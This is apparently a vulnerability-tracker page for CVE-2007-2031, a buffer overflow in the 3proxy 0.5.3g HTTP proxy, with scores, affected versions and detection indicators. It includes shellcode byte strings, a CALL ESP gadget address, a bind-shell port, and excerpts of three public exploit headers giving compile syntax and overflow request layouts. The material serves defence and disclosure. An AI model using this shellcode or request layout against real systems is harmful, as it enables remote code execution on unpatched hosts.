CVE-2007-2031
published 2007-04-16CVE-2007-2031: Buffer overflow in the HTTP proxy service for 3proxy 0.5 to 0.5.3g, and 0.6b-devel before 20070413, might allow remote attackers to execute arbitrary code via…
PriorityP356critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
15.31%
96.4th percentile
Buffer overflow in the HTTP proxy service for 3proxy 0.5 to 0.5.3g, and 0.6b-devel before 20070413, might allow remote attackers to execute arbitrary code via crafted transparent requests.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| 3proxy | 3proxy | <= 0.5.3g | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x4b\x76\x8d\x13
bytes↗
\x31\xc0\x50\x40\x89\xc3\x50\x40\x50\x89\xe1\xb0\x66\xcd\x80
bytes↗
\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51\x89\xe1\xb3\x01\xb0\x66\xcd\x80
- →The win32 exploit uses a 'CALL ESP' gadget at 0x7C81518B in kernel32.dll (WinXP SP2) as the EIP overwrite value. Presence of this address in network traffic targeting port 3128 is a strong indicator of exploitation. ↗
- →The win32 bind shellcode (Metasploit PexFnstenvSub encoded) opens a bind shell on port 7979. Monitor for unexpected listening services on port 7979 after 3proxy receives a malformed request. ↗
- ·Affected versions are 3proxy 0.5 through 0.5.3g and 0.6b-devel before 20070413. The default proxy port is 3128 but may be reconfigured. ↗
- ·The win32 exploit targets WinXP Home SP2 kernel32.dll CALL ESP gadgets; different Windows versions will have different gadget addresses and may require the -r option to specify an alternate return address. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
3proxy 0.5.3g - exec-shield 'proxy.c logurl()' Remote Overflow
exploitdb·2007-05-02
CVE-2007-2031 3proxy 0.5.3g - exec-shield 'proxy.c logurl()' Remote Overflow
3proxy 0.5.3g - exec-shield 'proxy.c logurl()' Remote Overflow
---
/*
**
** Fedora Core 5,6 (exec-shield) based
** 3proxy HTTP Proxy (3proxy-0.5.3g.tgz) remote overflow root exploit
** (reverse connect-back method) by Xpl017Elz
**
** Advanced exploitation in exec-shield (Fedora Core case study)
** URL: http://x82.inetcop.org/h0me/papers/FC_exploit/FC_exploit.txt
**
** Reference: https://www.securityfocus.com/bid/23545
** vendor: http://3proxy.ru/
**
** vade79/v9 [email protected] (fakehalo/realhalo)'s exploit:
** http://www.milw0rm.com/exploits/3821 (x3proxy.c)
**
** --
** exploit by "you dong-hun"(Xpl017Elz), .
** My World: http://x82.inetcop.org
**
*/
/*
** -=-= POINT! POINT! POINT! POINT! POINT! =-=-
**
** It is a relatively easy exploit case.
** It doesn't need any exec family functions
Exploit-DB
3proxy 0.5.3g (Windows x86) - 'proxy.c logurl()' Remote Buffer Overflow
exploitdb·2007-04-30
CVE-2007-2031 3proxy 0.5.3g (Windows x86) - 'proxy.c logurl()' Remote Buffer Overflow
3proxy 0.5.3g (Windows x86) - 'proxy.c logurl()' Remote Buffer Overflow
---
/*[ 3proxy[v0.5.3g]: (win32 service) remote buffer overflow exploit. ]*
* *
* by: vade79/v9 [email protected] (fakehalo/realhalo) *
* *
* compile: *
* gcc x3proxy-win32.c -o x3proxy-win32 *
* *
* syntax: *
* ./x3proxy-win32 [-pr] -h host *
* *
* sumus homepage/url: *
* http://3proxy.ru/ *
* *
* 3Proxy tiny free proxy server previously known as 3[APA3A] tiny *
* freeware proxy. *
* *
* I just saw a (gentoo) advisory, and got curious how easy it *
* would be to exploit this. The vulnerability is fairly *
* trival(win32 version): *
* *
* ----------------------------------------------------------------- *
* GET /[FILLERx1064][EIP/"CALL ESP"][NOPSx32][SHELLCODE]\n *
* Host: [FILLERx999]\n\n *
* --------------------------
Exploit-DB
3proxy 0.5.3g (Linux) - 'proxy.c logurl()' Remote Buffer Overflow
exploitdb·2007-04-30
CVE-2007-2031 3proxy 0.5.3g (Linux) - 'proxy.c logurl()' Remote Buffer Overflow
3proxy 0.5.3g (Linux) - 'proxy.c logurl()' Remote Buffer Overflow
---
/*[ 3proxy[v0.5.3g]: (linux) remote buffer overflow exploit. ]***
* *
* by: vade79/v9 [email protected] (fakehalo/realhalo) *
* *
* compile: *
* gcc x3proxy.c -o x3proxy *
* *
* syntax: *
* ./x3proxy [-pscr+] -h host *
* *
* sumus homepage/url: *
* http://3proxy.ru/ *
* *
* 3Proxy tiny free proxy server previously known as 3[APA3A] *
* tiny freeware proxy. *
* *
* I just saw a (gentoo) advisory, and got curious how easy *
* it would be to exploit this. The vulnerability is fairly *
* trival: *
* *
* ----------------------------------------------------------- *
* GET /[NOPS][SHELLCODE][RETADDR]\n *
* Host: [FILLER]\n\n *
* ----------------------------------------------------------- *
* *
* The length of "Host: [FILLER]" is
No writeups or analysis indexed.
http://3proxy.ru/0.5.3h/Changelog.txthttp://secunia.com/advisories/24961http://secunia.com/advisories/25001http://security.gentoo.org/glsa/glsa-200704-17.xmlhttp://www.securityfocus.com/archive/1/466650/100/100/threadedhttp://www.securityfocus.com/bid/23545http://www.vupen.com/english/advisories/2007/1442https://exchange.xforce.ibmcloud.com/vulnerabilities/33841http://3proxy.ru/0.5.3h/Changelog.txthttp://secunia.com/advisories/24961http://secunia.com/advisories/25001http://security.gentoo.org/glsa/glsa-200704-17.xmlhttp://www.securityfocus.com/archive/1/466650/100/100/threadedhttp://www.securityfocus.com/bid/23545http://www.vupen.com/english/advisories/2007/1442https://exchange.xforce.ibmcloud.com/vulnerabilities/33841
2007-04-16
Published